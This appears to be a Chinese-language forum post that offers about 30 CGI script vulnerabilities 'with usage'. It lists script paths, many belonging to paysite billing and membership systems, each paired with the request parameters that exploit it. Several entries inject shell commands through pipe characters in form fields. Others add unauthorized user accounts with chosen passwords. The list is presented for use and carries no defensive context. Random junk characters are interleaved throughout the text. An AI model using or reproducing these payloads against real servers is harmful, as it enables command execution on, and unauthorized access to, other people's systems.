Cgi-bin 30个漏洞＋使用方法

admin

==============================

2 G0 C6 r' v$ M2 a  _/smspass.pl
/ _2 q6 x  d2 J& u0 w; _8 |4 H7 fusername=username&password=password

1 R3 m8 _0 X6 \+ z* @. |, M/index.cgi
wei=ren&gen=command
, Z, T+ B/ C8 S7 R0 e" D
/passmaster.cgi
Action=Add&Username=Username&Password=Password

/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

9 v2 Y+ j' J" C" S! `/ }5 V* i/form.cgi
1 Y% i6 \) m) [name=xxxx&email=email&subject=xxxx&response=|echo;ls|
/ v' C1 E' z6 B$ ]6 p
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
+ J1 k# X) G3 Z3 A$ ?- l: M  muser=username&pass=Password&confirm=Password

& T" @! e6 E( L. O4 ^7 V/ccbill-local.asp
# n7 u* l: N1 m2 Z/ X' h$ Dpost_values=username:password
4 J4 n! v4 w" Z
/count.cgi
pinfile=|echo;ls -la;exit|
! \" t  @3 Y+ w" R
5 K* E5 I) s6 ~/ n2 A2 E7 B& F* B/recon.cgi
: |, \( d: s/ i- {2 S/recon.cgi?search
$ C4 I3 s6 u% }9 A8 x5 l2 esearchoption=1&searchfor=|echo;ls -al;exit|
+ F9 @4 l3 h/ u% Y/ i* f. R
7 j: g+ F! l1 a* J$ T" ~/verotelrum.pl
: U% U" B+ N( Overcode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
& Y! J# \$ u$ b: s/ q3 U6 T  O+ `username=username&password=password&expire=30

" |6 @* x( @1 \+ D* }/openjournal.cgi
1 X% t: S3 p/ h9 [& W) Fedit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
/ _7 `1 D; c: _, vcmd=ADD&user=username&pass=password

/probecontrol.cgi
* ~+ z& y4 h, Y" J+ A6 R9 \0 |: ucommand=enable&username=username&password=password

9 d: F1 m& x2 E) k  O/recon.cgi
8 z* Q+ ?  [: w- l6 _searchoption=3&searchfor=echo;ls -la;exit
$ Y1 I7 O+ u3 S
4 t+ J* B- T" X" k; p5 b/htadd.pl
4 ~( m1 x  \5 h+ X0 V2 @configfile=|echo; ls -alt; exit
! a; P7 N7 y# B8 K0 T/ l
  r, X9 y6 J5 H( L: t/gx9passwd.cgi
cmd=ADD&user=username&pass=password
8 M% f: f" l. _* e, B! G/ a# m0 h
/ i6 @4 Q5 {$ X" [# _: C+ `! Y/ibill*.pl
6 ?1 @1 c* V% v/ i# }/ ?reqtype=add&authpwd=authpwd&username=username&password=password

- B. X. r; H! K, q/cpay.cgi
3 |! e' r9 s, r( mcommand=add_member&username=username(EMAIL)&password=password(DES)
# K- A; D; G  q5 Z+ `( z- B. c+ b0 r
% M7 G2 m1 x+ c9 L( m. |/ B/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

# B6 W$ q$ ^+ f7 i/ o% z' o1 ?+ ~/usercontrol.cgi
9 Y/ q& u. V1 Z! A$ b) N) V; A, h8 Y9 ccommand=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

5 ]' f  O* t- K/addusr.pl
' o2 p6 @5 P- V$ g" Kuser=USER&pass=PASS&confirm=PASS

* u/ O& q& L/ r' V# |  m  U# [/pincount.cgi
. s, M! ~% G+ [9 U; l/ G/ Y/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

+ }0 S' d, ~9 P, V1 r0 y/ e; I" J5 F& F/accountcreate.cgi
6 k* e5 \' @. z' Z7 z; ]/cgi-bin/gateway/accountcreate.cgi
/ M) e/ y* `1 Y" x0 [; {+ Dusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
/env.cgi
ADD+;echo;pwd;exit
* L! `# g% }) A) \- z
: `& t, ~' N0 A. m* e5 t: R* F/count.cgi
pinfile=|echo;pwd;exit|

/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
; E" L# T3 Y/ u  e7 r$ }* L
0 {8 g& I) N$ H$ W' h" f# B/add.cgi
username=username&password=password&expire=30
& R( j3 S7 p7 ]$ S3 D/ k
7 `- z0 z# C0 H" i9 J3 a; P==============================